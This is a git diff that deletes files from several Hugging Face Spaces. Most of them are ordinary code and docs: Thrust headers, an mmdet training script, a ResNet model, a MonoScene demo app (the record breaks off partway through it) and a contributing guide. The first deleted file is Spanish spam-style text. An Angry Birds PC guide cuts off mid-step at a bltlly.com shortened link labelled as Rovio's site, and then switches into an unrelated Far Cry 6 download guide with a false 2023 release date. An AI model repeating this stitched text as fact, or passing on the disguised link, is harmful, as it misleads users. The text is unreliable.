-Mientras que Angry Birds Star Wars 2 está diseñado originalmente para dispositivos móviles, reproducirlo en PC tiene muchas ventajas. Por un lado, se puede disfrutar del juego en una pantalla más grande, con mejores gráficos y calidad de sonido. También puede utilizar el ratón y el teclado para controlar el juego más fácilmente, sin preocuparse por los dedos bloqueando la vista o quedándose sin batería. Jugar en PC también te da acceso a algunas funciones que no están disponibles en dispositivos móviles, como las mejoras BlueStacks que pueden mejorar tu experiencia de juego.
-Cómo descargar y jugar Angry Birds Star Wars 2 en PC
-Método 1: Usando el emulador de BlueStacks
-BlueStacks es un emulador de Android que te permite ejecutar aplicaciones y juegos de Android en tu PC. Es uno de los emuladores más populares y confiables del mercado, con más de 500 millones de usuarios en todo el mundo. Estos son los pasos para descargar y jugar Angry Birds Star Wars 2 en PC usando BlueStacks:
-
-Para descargar BlueStacks, vaya a https://www.bluestacks.com/apps/casual/ angry-birds-star-wars-2-on-pc.html y haga clic en el botón Descargar Angry Birds Star Wars 2 en PC. Esto descargará el instalador de BlueStacks en su PC. Para instalar BlueStacks, haga doble clic en el instalador y siga las instrucciones en la pantalla. El proceso de instalación puede tardar unos minutos, dependiendo de las especificaciones de su PC.
-Paso 2: Completa el inicio de sesión de Google para acceder a la Play Store
-Después de instalar BlueStacks, iniciarlo y completar el proceso de inicio de sesión de Google. Esto te permitirá acceder a Google Play Store, donde puedes encontrar y descargar Angry Birds Star Wars 2. Si ya tienes una cuenta de Google, puedes usarla para iniciar sesión. Si no, puedes crear uno gratis.
-Paso 3: Busca Angry Birds Star Wars 2 en la barra de búsqueda
-Una vez que esté en la Play Store, busque Angry Birds Star Wars 2 en la barra de búsqueda en la esquina superior derecha de la pantalla. También puedes navegar por la categoría Casual para encontrar el juego.
-
-Paso 4: Haga clic para instalar Angry Birds Star Wars 2 de los resultados de búsqueda
-Cuando vea Angry Birds Star Wars 2 en los resultados de búsqueda, haga clic en él para abrir su página. Luego, haz clic en el botón Instalar para comenzar a descargar e instalar el juego en tu PC. Esto puede tardar unos minutos, dependiendo de la velocidad de Internet y el rendimiento del PC.
-Paso 5: Haga clic en el icono de Angry Birds Star Wars 2 en la pantalla de inicio para comenzar a jugar
-Después de instalar Angry Birds Star Wars 2, puede encontrar su icono en la pantalla de inicio de BlueStacks. Haga clic en él para iniciar el juego y comenzar a jugar. También puedes acceder al juego desde tu escritorio o menú de inicio.
-Método 2: Uso del sitio web de Rovio
-
-Paso 1: Ir al sitio web de Rovio y haga clic en Angry Birds Star Wars 2
-Para ir al sitio web de Rovio, visite https://bltlly.com/2v6Mka
-Far Cry 6 fue lanzado en todo el mundo el 7 de octubre de 2023, para PlayStation 4, PlayStation 5, Xbox One, Xbox Series X/S, PC, Stadia y Amazon Luna. Si te estás preguntando cómo descargar Far Cry 6 en tu plataforma preferida, has venido al lugar correcto. En este artículo, te mostraremos todo lo que necesitas saber sobre la descarga de Far Cry 6, incluidos los bonos de reserva, los requisitos del sistema y las guías paso a paso para cada plataforma.
- Far Cry 6 Bonos de reserva
-Si reservaste cualquier edición de Far Cry 6 antes de su fecha de lanzamiento, obtendrás algunos bonos exclusivos que mejorarán tu experiencia de juego. Estos bonos incluyen:
-
-- Discos Locos - un arma mortal lanzador de discos que puede rebotar en las paredes y los enemigos.
-- Libertad Chorizo - una piel para Chorizo, el adorable compañero de perro salchicha.
-
-Para obtener estos bonos, tendrá que canjear un código que viene con su correo electrónico de confirmación o recibo de reserva. Dependiendo de tu plataforma, deberás introducir este código en PlayStation Store, Microsoft Store, Epic Games Store, Ubisoft Store, Ubisoft+, la aplicación o sitio web de Stadia o la aplicación o sitio web de Luna. Una vez que canjees el código, podrás acceder a los bonos en el juego.
- Requisitos del sistema Far Cry 6
-Si estás planeando jugar Far Cry 6 en PC, tendrás que asegurarte de que tu sistema cumple con los requisitos mínimos o recomendados para el juego. Aquí hay una tabla de los requisitos del sistema para Far Cry 6:
-
-
-Requisitos mínimos |
-
-
-
-CPU: AMD Ryzen 3 1200 - 3.1 GHz / Intel i5-4460 - 3.2 GHz |
-CPU: AMD Ryzen 5 3600X - 3.8 GHZ / Intel i7-7700 - 3.6 GHZ |
-
-GPU: AMD RX 460 - 4 GB / NVIDIA GTX 960 - 4 GB |
-GPU: AMD RX VEGA64 - 8 GB / NVIDIA GTX 1080 - 8 GB |
-
-
-RAM: 8 GB (modo de doble canal) |
-RAM: 16 GB (modo de doble canal) |
-
-
-Almacenamiento: 60 GB HDD (SSD recomendado) |
-Almacenamiento: 60 GB HDD (SSD recomendado) |
-
-
-OS: Windows 10 (64 bits) |
-OS: Windows 10 (64 bits) |
-
-
- También puede comprobar la compatibilidad de su PC con Far Cry 6 mediante la aplicación Ubisoft Connect, que escaneará su sistema y lo comparará con los requisitos del juego. Puedes descargar la aplicación Ubisoft Connect desde la Ubisoft Store o el sitio web de Ubisoft.
- Cómo descargar Far Cry 6 en PC
-Si quieres jugar Far Cry 6 en PC, tienes varias opciones para elegir. Puedes comprar y descargar el juego en Epic Games Store, Ubisoft Store o Ubisoft+, que es el servicio de suscripción de Ubisoft que te da acceso a más de 100 juegos. He aquí cómo descargar Far Cry 6 en PC desde cada plataforma:
- Tienda de juegos épicos
-
-- Lanza el lanzador de juegos épicos en tu PC, o descárgalo desde el sitio web de Epic Games si no lo tienes.
-- Inicia sesión con tu cuenta de Epic Games, o crea una si no tienes una.
-- Ir a la pestaña Tienda y buscar Far Cry 6, o haga clic en este enlace para ir directamente a la página del juego.
-- Seleccione la edición de Far Cry 6 que desea comprar, y haga clic en Comprar ahora.
-- Introduzca sus datos de pago y confirme su compra.
-- Vaya a la pestaña Biblioteca y haga clic en Far Cry 6 para comenzar a descargar el juego.
-- Una vez completada la descarga, haga clic en Iniciar para comenzar a jugar el juego.
-
- Tienda de Ubisoft
-
-
-- Inicia sesión con tu cuenta de Ubisoft, o crea una si no tienes una.
-- Ir a la pestaña Tienda y buscar Far Cry 6, o haga clic en este enlace para ir directamente a la página del juego.
-- Seleccione la edición de Far Cry 6 que desea comprar, y haga clic en Añadir al carrito.
-- Haga clic en Pago e introduzca sus datos de pago y confirme su compra.
-- Ir a la pestaña Juegos y haga clic en Far Cry 6 para comenzar a descargar el juego.
-- Una vez completada la descarga, haz clic en Jugar para empezar a jugar.
-
- Ubisoft+
-
-- Vaya al sitio web de Ubisoft+ e inicie sesión con su cuenta de Ubisoft, o cree una si no tiene una.
-- Haga clic en Suscribirse ahora y elija un plan mensual o anual. Obtendrá una prueba gratuita durante siete días si es un suscriptor nuevo.
-- Introduzca sus datos de pago y confirme su suscripción.
-- Inicie la aplicación Ubisoft Connect en su PC, o descárguela desde la Ubisoft Store o el sitio web de Ubisoft si no la tiene.
-- Vaya a la pestaña Juegos y haga clic en Far Cry 6 para comenzar a descargar el juego. Tendrás acceso a la edición definitiva de Far Cry 6, que incluye todos los DLC y contenido adicional.
-- Una vez completada la descarga, haz clic en Jugar para empezar a jugar.
-
- Cómo descargar Far Cry 6 en PlayStation
- Si quieres jugar a Far Cry 6 en PlayStation 4 o PlayStation 5, puedes comprar y descargar el juego desde PlayStation Store. He aquí cómo descargar Far Cry 6 en PlayStation:
-
-
- - Enciende tu consola PlayStation e inicia sesión con tu cuenta de PlayStation Network, o crea una si no tienes una.
- - Vaya al icono de PlayStation Store en la pantalla de inicio y selecciónelo.
- - Buscar Far Cry 6, o haga clic en este enlace (para PS4) o este enlace (para PS5) para ir directamente a la página del juego.
- - Seleccione la edición de Far Cry 6 que desea comprar , y haga clic en Añadir al carrito.
-
-- Ve a tu biblioteca y selecciona Comprado. Encuentra Far Cry 6 y haz clic en Descargar.
-- Una vez completada la descarga, puede iniciar el juego desde su pantalla de inicio o Biblioteca.
-
- Cómo descargar Far Cry 6 en Xbox
-Si quieres jugar a Far Cry 6 en Xbox One o Xbox Series X/S, puedes comprar y descargar el juego en Microsoft Store. He aquí cómo descargar Far Cry 6 en Xbox:
-
-- Encienda su consola Xbox e inicie sesión con su cuenta de Microsoft, o cree una si no tiene una.
-- Vaya al icono de Microsoft Store en la pantalla de inicio y selecciónelo.
-- Buscar Far Cry 6, o haga clic en este enlace (para Xbox One) o este enlace (para Xbox Series X/S) para ir directamente a la página del juego.
-- Seleccione la edición de Far Cry 6 que desea comprar, y haga clic en Comprar ahora.
-- Introduzca sus datos de pago y confirme su compra.
-- El juego comenzará a descargarse automáticamente. Puede comprobar el progreso en la sección Cola del menú Mis juegos y aplicaciones.
-- Una vez que la descarga se ha completado, puede iniciar el juego desde la pantalla de inicio o el menú Mis juegos y aplicaciones.
-
- Cómo descargar Far Cry 6 en Stadia
-Si quieres jugar Far Cry 6 en Stadia, puedes comprar y transmitir el juego desde la aplicación o sitio web de Stadia. He aquí cómo descargar Far Cry 6 en Stadia:
-
-- Vaya a la aplicación o sitio web de Stadia e inicie sesión con su cuenta de Google, o cree una si no tiene una.
-- Buscar Far Cry 6, o haga clic en este enlace para ir directamente a la página del juego.
-- Seleccione la edición de Far Cry 6 que desea comprar, y haga clic en Comprar.
-- Introduzca sus datos de pago y confirme su compra.
-- El juego se agregará a su biblioteca. Puede comenzar a jugarlo haciendo clic en Play.
-
- Cómo descargar Far Cry 6 en Amazon Luna
-
-
-- Vaya a la aplicación o sitio web de Luna e inicie sesión con su cuenta de Amazon, o cree una si no tiene una.
-- Buscar Far Cry 6, o haga clic en este enlace para ir directamente a la página del juego.
-- Seleccione la edición de Far Cry 6 que desea comprar, y haga clic en Comprar ahora.
-- Introduzca sus datos de pago y confirme su compra.
-- El juego se agregará a su biblioteca. Puede comenzar a jugarlo haciendo clic en Play.
-
- Conclusión
- Far Cry 6 es un emocionante juego de acción y aventura que te permite explorar una gran isla de mundo abierto, luchar contra un dictador despiadado y personalizar tus armas y vehículos. Tanto si juegas en PC, PlayStation, Xbox, Stadia o Amazon Luna, puedes descargar fácilmente Far Cry 6 siguiendo nuestras guías anteriores. No pierdas esta oportunidad de unirte a la revolución y liberar a Yara de la opresión de Antón Castillo. Reserva o compra Far Cry 6 hoy y prepárate para una experiencia de juego inolvidable.
- Preguntas frecuentes
- P: ¿Qué tan grande es Far Cry 6?
- A: Según Ubisoft, Far Cry 6 tiene alrededor de 50 GB de tamaño para PC, PlayStation y Xbox. Para Stadia y Amazon Luna, el tamaño puede variar dependiendo de su conexión a Internet y calidad de transmisión.
- Q: ¿Puedo jugar Far Cry 6 sin conexión?
- A: Sí, puedes jugar Far Cry 6 sin conexión en modo de un solo jugador. Sin embargo, necesitarás una conexión a Internet para algunas funciones, como multijugador cooperativo, almacenamiento en la nube, tablas de clasificación y actualizaciones.
- Q: ¿Puedo jugar Far Cry 6 con mis amigos?
- A: Sí, puedes jugar a Far Cry 6 con tus amigos en modo multijugador cooperativo. Puedes invitar a hasta tres amigos a unirse a tu juego y explorar Yara juntos. También puedes usar funciones de cross-play y cross-progression para jugar con amigos en diferentes plataformas y dispositivos.
-
- P: ¿Cuál es la diferencia entre las ediciones Standard, Gold, Ultimate y Collector’s de Far Cry 6?
- A: La Edición Estándar de Far Cry 6 incluye el juego base y los bonos de preorden. La Edición de Oro incluye el juego base, los bonos de preorden y el Pase de Temporada, que te da acceso a tres DLCs y más contenido. La Ultimate Edition incluye todo en la Gold Edition, además del Ultimate Pack, que contiene cuatro paquetes cosméticos: el Croc Hunter Pack, el Vice Pack, el Jungle Expedition Pack y el Blood Dragon Pack. The Collector’s Edition incluye todo en la Ultimate Edition, además de una réplica física de Tostador, un arma lanzallamas del juego, una caja de acero, un libro de arte, un mapa de Yara, un CD de banda sonora, un conjunto de pegatinas y un llavero.
64aa2da5cf
-
-
\ No newline at end of file
diff --git a/spaces/Bonosa2/dall-e_image-generation/README.md b/spaces/Bonosa2/dall-e_image-generation/README.md
deleted file mode 100644
index 279a2722cd167e71289700c972877704a79b3503..0000000000000000000000000000000000000000
--- a/spaces/Bonosa2/dall-e_image-generation/README.md
+++ /dev/null
@@ -1,12 +0,0 @@
----
-title: Dall-e Image-generation
-emoji: 📉
-colorFrom: pink
-colorTo: indigo
-sdk: gradio
-sdk_version: 3.29.0
-app_file: app.py
-pinned: false
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/CVPR/Dual-Key_Backdoor_Attacks/openvqa/docs/_source/advanced/contributing.md b/spaces/CVPR/Dual-Key_Backdoor_Attacks/openvqa/docs/_source/advanced/contributing.md
deleted file mode 100644
index ad69fc0e40a1bbe39f63d5d594ec01f0db463e7f..0000000000000000000000000000000000000000
--- a/spaces/CVPR/Dual-Key_Backdoor_Attacks/openvqa/docs/_source/advanced/contributing.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Contributing to OpenVQA
-
-All kinds of contributions are welcome, including but not limited to the following.
-
-- Fixes (typo, bugs)
-- New features and components
-
-## Workflow
-
-1. fork and pull the latest version of OpenVQA
-2. checkout a new branch (do not use master branch for PRs)
-3. commit your changes
-4. create a PR
-
-## Code style
-
-### Python
-We adopt [PEP8](https://www.python.org/dev/peps/pep-0008/) as the preferred code style.
-We use [flake8](http://flake8.pycqa.org/en/latest/) as the linter and [yapf](https://github.com/google/yapf) as the formatter.
-Please upgrade to the latest yapf (>=0.27.0) and refer to the configuration.
-
->Before you create a PR, make sure that your code lints and is formatted by yapf.
-
-### C++ and CUDA
-We follow the [Google C++ Style Guide](https://google.github.io/styleguide/cppguide.html).
-
-
-
-
diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/replace.h b/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/replace.h
deleted file mode 100644
index 6167f711ad16ce3015df0c892394788f317680b2..0000000000000000000000000000000000000000
--- a/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/replace.h
+++ /dev/null
@@ -1,98 +0,0 @@
-/*
- * Copyright 2008-2013 NVIDIA Corporation
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-
-#pragma once
-
-#include
-#include
-
-namespace thrust
-{
-namespace system
-{
-namespace detail
-{
-namespace generic
-{
-
-
-template
-__host__ __device__
- OutputIterator replace_copy_if(thrust::execution_policy &exec,
- InputIterator first,
- InputIterator last,
- OutputIterator result,
- Predicate pred,
- const T &new_value);
-
-
-template
-__host__ __device__
- OutputIterator replace_copy_if(thrust::execution_policy &exec,
- InputIterator1 first,
- InputIterator1 last,
- InputIterator2 stencil,
- OutputIterator result,
- Predicate pred,
- const T &new_value);
-
-
-template
-__host__ __device__
- OutputIterator replace_copy(thrust::execution_policy &exec,
- InputIterator first,
- InputIterator last,
- OutputIterator result,
- const T &old_value,
- const T &new_value);
-
-
-template
-__host__ __device__
- void replace_if(thrust::execution_policy &exec,
- ForwardIterator first,
- ForwardIterator last,
- Predicate pred,
- const T &new_value);
-
-
-template
-__host__ __device__
- void replace_if(thrust::execution_policy &exec,
- ForwardIterator first,
- ForwardIterator last,
- InputIterator stencil,
- Predicate pred,
- const T &new_value);
-
-
-template
-__host__ __device__
- void replace(thrust::execution_policy &exec,
- ForwardIterator first,
- ForwardIterator last,
- const T &old_value,
- const T &new_value);
-
-
-} // end namespace generic
-} // end namespace detail
-} // end namespace system
-} // end namespace thrust
-
-#include
-
diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/tbb/detail/find.h b/spaces/CVPR/LIVE/thrust/thrust/system/tbb/detail/find.h
deleted file mode 100644
index e07d322a87c2494a4eba62e92447b7b970112eb4..0000000000000000000000000000000000000000
--- a/spaces/CVPR/LIVE/thrust/thrust/system/tbb/detail/find.h
+++ /dev/null
@@ -1,46 +0,0 @@
-/*
- * Copyright 2008-2013 NVIDIA Corporation
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-#pragma once
-
-#include
-#include
-#include
-
-namespace thrust
-{
-namespace system
-{
-namespace tbb
-{
-namespace detail
-{
-
-template
-InputIterator find_if(execution_policy &exec,
- InputIterator first,
- InputIterator last,
- Predicate pred)
-{
- // tbb prefers generic::find_if to cpp::find_if
- return thrust::system::detail::generic::find_if(exec, first, last, pred);
-}
-
-} // end namespace detail
-} // end namespace tbb
-} // end namespace system
-} // end namespace thrust
-
diff --git a/spaces/CVPR/WALT/walt/apis/train.py b/spaces/CVPR/WALT/walt/apis/train.py
deleted file mode 100644
index 6c8003d5fdf20a3d6a04ab4a031b053cf56d49c7..0000000000000000000000000000000000000000
--- a/spaces/CVPR/WALT/walt/apis/train.py
+++ /dev/null
@@ -1,187 +0,0 @@
-import random
-import warnings
-
-import numpy as np
-import torch
-from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
-from mmcv.runner import (HOOKS, DistSamplerSeedHook, EpochBasedRunner,
- Fp16OptimizerHook, OptimizerHook, build_optimizer,
- build_runner)
-from mmcv.utils import build_from_cfg
-
-from mmdet.core import DistEvalHook, EvalHook
-from walt.datasets import (build_dataloader, build_dataset,
- replace_ImageToTensor)
-from mmdet.utils import get_root_logger
-from mmcv_custom.runner import EpochBasedRunnerAmp
-try:
- import apex
-except:
- print('apex is not installed')
-
-
-def set_random_seed(seed, deterministic=False):
- """Set random seed.
-
- Args:
- seed (int): Seed to be used.
- deterministic (bool): Whether to set the deterministic option for
- CUDNN backend, i.e., set `torch.backends.cudnn.deterministic`
- to True and `torch.backends.cudnn.benchmark` to False.
- Default: False.
- """
- random.seed(seed)
- np.random.seed(seed)
- torch.manual_seed(seed)
- torch.cuda.manual_seed_all(seed)
- if deterministic:
- torch.backends.cudnn.deterministic = True
- torch.backends.cudnn.benchmark = False
-
-
-def train_detector(model,
- dataset,
- cfg,
- distributed=False,
- validate=False,
- timestamp=None,
- meta=None):
- logger = get_root_logger(cfg.log_level)
-
- # prepare data loaders
- dataset = dataset if isinstance(dataset, (list, tuple)) else [dataset]
- if 'imgs_per_gpu' in cfg.data:
- logger.warning('"imgs_per_gpu" is deprecated in MMDet V2.0. '
- 'Please use "samples_per_gpu" instead')
- if 'samples_per_gpu' in cfg.data:
- logger.warning(
- f'Got "imgs_per_gpu"={cfg.data.imgs_per_gpu} and '
- f'"samples_per_gpu"={cfg.data.samples_per_gpu}, "imgs_per_gpu"'
- f'={cfg.data.imgs_per_gpu} is used in this experiments')
- else:
- logger.warning(
- 'Automatically set "samples_per_gpu"="imgs_per_gpu"='
- f'{cfg.data.imgs_per_gpu} in this experiments')
- cfg.data.samples_per_gpu = cfg.data.imgs_per_gpu
-
- data_loaders = [
- build_dataloader(
- ds,
- cfg.data.samples_per_gpu,
- cfg.data.workers_per_gpu,
- # cfg.gpus will be ignored if distributed
- len(cfg.gpu_ids),
- dist=distributed,
- seed=cfg.seed) for ds in dataset
- ]
-
- # build optimizer
- optimizer = build_optimizer(model, cfg.optimizer)
-
- # use apex fp16 optimizer
- if cfg.optimizer_config.get("type", None) and cfg.optimizer_config["type"] == "DistOptimizerHook":
- if cfg.optimizer_config.get("use_fp16", False):
- model, optimizer = apex.amp.initialize(
- model.cuda(), optimizer, opt_level="O1")
- for m in model.modules():
- if hasattr(m, "fp16_enabled"):
- m.fp16_enabled = True
-
- # put model on gpus
- if distributed:
- find_unused_parameters = cfg.get('find_unused_parameters', False)
- # Sets the `find_unused_parameters` parameter in
- # torch.nn.parallel.DistributedDataParallel
- model = MMDistributedDataParallel(
- model.cuda(),
- device_ids=[torch.cuda.current_device()],
- broadcast_buffers=False,
- find_unused_parameters=find_unused_parameters)
- else:
- model = MMDataParallel(
- model.cuda(cfg.gpu_ids[0]), device_ids=cfg.gpu_ids)
-
- if 'runner' not in cfg:
- cfg.runner = {
- 'type': 'EpochBasedRunner',
- 'max_epochs': cfg.total_epochs
- }
- warnings.warn(
- 'config is now expected to have a `runner` section, '
- 'please set `runner` in your config.', UserWarning)
- else:
- if 'total_epochs' in cfg:
- assert cfg.total_epochs == cfg.runner.max_epochs
-
- # build runner
- runner = build_runner(
- cfg.runner,
- default_args=dict(
- model=model,
- optimizer=optimizer,
- work_dir=cfg.work_dir,
- logger=logger,
- meta=meta))
-
- # an ugly workaround to make .log and .log.json filenames the same
- runner.timestamp = timestamp
-
- # fp16 setting
- fp16_cfg = cfg.get('fp16', None)
- if fp16_cfg is not None:
- optimizer_config = Fp16OptimizerHook(
- **cfg.optimizer_config, **fp16_cfg, distributed=distributed)
- elif distributed and 'type' not in cfg.optimizer_config:
- optimizer_config = OptimizerHook(**cfg.optimizer_config)
- else:
- optimizer_config = cfg.optimizer_config
-
- # register hooks
- runner.register_training_hooks(cfg.lr_config, optimizer_config,
- cfg.checkpoint_config, cfg.log_config,
- cfg.get('momentum_config', None))
- if distributed:
- if isinstance(runner, EpochBasedRunner):
- runner.register_hook(DistSamplerSeedHook())
-
- # register eval hooks
- if validate:
- # Support batch_size > 1 in validation
- val_samples_per_gpu = cfg.data.val.pop('samples_per_gpu', 1)
- if val_samples_per_gpu > 1:
- # Replace 'ImageToTensor' to 'DefaultFormatBundle'
- cfg.data.val.pipeline = replace_ImageToTensor(
- cfg.data.val.pipeline)
- val_dataset = build_dataset(cfg.data.val, dict(test_mode=True))
- val_dataloader = build_dataloader(
- val_dataset,
- samples_per_gpu=val_samples_per_gpu,
- workers_per_gpu=cfg.data.workers_per_gpu,
- dist=distributed,
- shuffle=False)
- eval_cfg = cfg.get('evaluation', {})
- eval_cfg['by_epoch'] = cfg.runner['type'] != 'IterBasedRunner'
- eval_hook = DistEvalHook if distributed else EvalHook
- runner.register_hook(eval_hook(val_dataloader, **eval_cfg))
- '''
- '''
-
- # user-defined hooks
- if cfg.get('custom_hooks', None):
- custom_hooks = cfg.custom_hooks
- assert isinstance(custom_hooks, list), \
- f'custom_hooks expect list type, but got {type(custom_hooks)}'
- for hook_cfg in cfg.custom_hooks:
- assert isinstance(hook_cfg, dict), \
- 'Each item in custom_hooks expects dict type, but got ' \
- f'{type(hook_cfg)}'
- hook_cfg = hook_cfg.copy()
- priority = hook_cfg.pop('priority', 'NORMAL')
- hook = build_from_cfg(hook_cfg, HOOKS)
- runner.register_hook(hook, priority=priority)
-
- if cfg.resume_from:
- runner.resume(cfg.resume_from)
- elif cfg.load_from:
- runner.load_checkpoint(cfg.load_from)
- runner.run(data_loaders, cfg.workflow)
diff --git a/spaces/CVPR/lama-example/models/ade20k/resnet.py b/spaces/CVPR/lama-example/models/ade20k/resnet.py
deleted file mode 100644
index 3e1d521f171c984cf6a7ff3dcebd96f8c5faf908..0000000000000000000000000000000000000000
--- a/spaces/CVPR/lama-example/models/ade20k/resnet.py
+++ /dev/null
@@ -1,181 +0,0 @@
-"""Modified from https://github.com/CSAILVision/semantic-segmentation-pytorch"""
-
-import math
-
-import torch.nn as nn
-from torch.nn import BatchNorm2d
-
-from .utils import load_url
-
-__all__ = ['ResNet', 'resnet50']
-
-
-model_urls = {
- 'resnet50': 'http://sceneparsing.csail.mit.edu/model/pretrained_resnet/resnet50-imagenet.pth',
-}
-
-
-def conv3x3(in_planes, out_planes, stride=1):
- "3x3 convolution with padding"
- return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
- padding=1, bias=False)
-
-
-class BasicBlock(nn.Module):
- expansion = 1
-
- def __init__(self, inplanes, planes, stride=1, downsample=None):
- super(BasicBlock, self).__init__()
- self.conv1 = conv3x3(inplanes, planes, stride)
- self.bn1 = BatchNorm2d(planes)
- self.relu = nn.ReLU(inplace=True)
- self.conv2 = conv3x3(planes, planes)
- self.bn2 = BatchNorm2d(planes)
- self.downsample = downsample
- self.stride = stride
-
- def forward(self, x):
- residual = x
-
- out = self.conv1(x)
- out = self.bn1(out)
- out = self.relu(out)
-
- out = self.conv2(out)
- out = self.bn2(out)
-
- if self.downsample is not None:
- residual = self.downsample(x)
-
- out += residual
- out = self.relu(out)
-
- return out
-
-
-class Bottleneck(nn.Module):
- expansion = 4
-
- def __init__(self, inplanes, planes, stride=1, downsample=None):
- super(Bottleneck, self).__init__()
- self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
- self.bn1 = BatchNorm2d(planes)
- self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
- padding=1, bias=False)
- self.bn2 = BatchNorm2d(planes)
- self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
- self.bn3 = BatchNorm2d(planes * 4)
- self.relu = nn.ReLU(inplace=True)
- self.downsample = downsample
- self.stride = stride
-
- def forward(self, x):
- residual = x
-
- out = self.conv1(x)
- out = self.bn1(out)
- out = self.relu(out)
-
- out = self.conv2(out)
- out = self.bn2(out)
- out = self.relu(out)
-
- out = self.conv3(out)
- out = self.bn3(out)
-
- if self.downsample is not None:
- residual = self.downsample(x)
-
- out += residual
- out = self.relu(out)
-
- return out
-
-
-class ResNet(nn.Module):
-
- def __init__(self, block, layers, num_classes=1000):
- self.inplanes = 128
- super(ResNet, self).__init__()
- self.conv1 = conv3x3(3, 64, stride=2)
- self.bn1 = BatchNorm2d(64)
- self.relu1 = nn.ReLU(inplace=True)
- self.conv2 = conv3x3(64, 64)
- self.bn2 = BatchNorm2d(64)
- self.relu2 = nn.ReLU(inplace=True)
- self.conv3 = conv3x3(64, 128)
- self.bn3 = BatchNorm2d(128)
- self.relu3 = nn.ReLU(inplace=True)
- self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
-
- self.layer1 = self._make_layer(block, 64, layers[0])
- self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
- self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
- self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
- self.avgpool = nn.AvgPool2d(7, stride=1)
- self.fc = nn.Linear(512 * block.expansion, num_classes)
-
- for m in self.modules():
- if isinstance(m, nn.Conv2d):
- n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
- m.weight.data.normal_(0, math.sqrt(2. / n))
- elif isinstance(m, BatchNorm2d):
- m.weight.data.fill_(1)
- m.bias.data.zero_()
-
- def _make_layer(self, block, planes, blocks, stride=1):
- downsample = None
- if stride != 1 or self.inplanes != planes * block.expansion:
- downsample = nn.Sequential(
- nn.Conv2d(self.inplanes, planes * block.expansion,
- kernel_size=1, stride=stride, bias=False),
- BatchNorm2d(planes * block.expansion),
- )
-
- layers = []
- layers.append(block(self.inplanes, planes, stride, downsample))
- self.inplanes = planes * block.expansion
- for i in range(1, blocks):
- layers.append(block(self.inplanes, planes))
-
- return nn.Sequential(*layers)
-
- def forward(self, x):
- x = self.relu1(self.bn1(self.conv1(x)))
- x = self.relu2(self.bn2(self.conv2(x)))
- x = self.relu3(self.bn3(self.conv3(x)))
- x = self.maxpool(x)
-
- x = self.layer1(x)
- x = self.layer2(x)
- x = self.layer3(x)
- x = self.layer4(x)
-
- x = self.avgpool(x)
- x = x.view(x.size(0), -1)
- x = self.fc(x)
-
- return x
-
-
-def resnet50(pretrained=False, **kwargs):
- """Constructs a ResNet-50 model.
-
- Args:
- pretrained (bool): If True, returns a model pre-trained on ImageNet
- """
- model = ResNet(Bottleneck, [3, 4, 6, 3], **kwargs)
- if pretrained:
- model.load_state_dict(load_url(model_urls['resnet50']), strict=False)
- return model
-
-
-def resnet18(pretrained=False, **kwargs):
- """Constructs a ResNet-18 model.
- Args:
- pretrained (bool): If True, returns a model pre-trained on ImageNet
- """
- model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
- if pretrained:
- model.load_state_dict(load_url(model_urls['resnet18']))
- return model
\ No newline at end of file
diff --git a/spaces/CVPR/monoscene_lite/app.py b/spaces/CVPR/monoscene_lite/app.py
deleted file mode 100644
index b8e3d855500b09da634c5a356fbae9569d514704..0000000000000000000000000000000000000000
--- a/spaces/CVPR/monoscene_lite/app.py
+++ /dev/null
@@ -1,121 +0,0 @@
-import gradio as gr
-import numpy as np
-from torchvision import transforms
-import torch
-from helpers import *
-import sys
-import csv
-from monoscene.monoscene import MonoScene
-
-csv.field_size_limit(sys.maxsize)
-torch.set_grad_enabled(False)
-
-
-model = MonoScene.load_from_checkpoint(
- "monoscene_kitti.ckpt",
- dataset="kitti",
- n_classes=20,
- feature = 64,
- project_scale = 4,
- full_scene_size = (256, 256, 32),
- )
-
-img_W, img_H = 1220, 370
-
-
-def predict(img):
- img = np.array(img, dtype=np.float32, copy=False) / 255.0
-
- normalize_rgb = transforms.Compose(
- [
- transforms.ToTensor(),
- transforms.Normalize(
- mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
- ),
- ]
- )
- img = normalize_rgb(img)
-
- batch = get_projections(img_W, img_H)
- batch["img"] = img
- for k in batch:
- batch[k] = batch[k].unsqueeze(0)#.cuda()
-
- pred = model(batch).squeeze()
- fig = draw(pred, batch['fov_mask_2'])
-
-
- return fig
-
-
-description = """
-MonoScene Demo on SemanticKITTI Validation Set (Sequence 08), which uses the camera parameters of Sequence 08.
-Due to the CPU-only inference, it might take up to 20s to predict a scene. \n
-This is a smaller model with half resolution and w/o 3D CRP. You can find the full model at: https://huggingface.co/spaces/CVPR/MonoScene
-
-
-
-
-
-
-
-"""
-title = "MonoScene Lite - Half resolution, w/o 3D CRP"
-article="""
-
-
-
-"""
-
-examples = [
- 'images/08/001385.jpg',
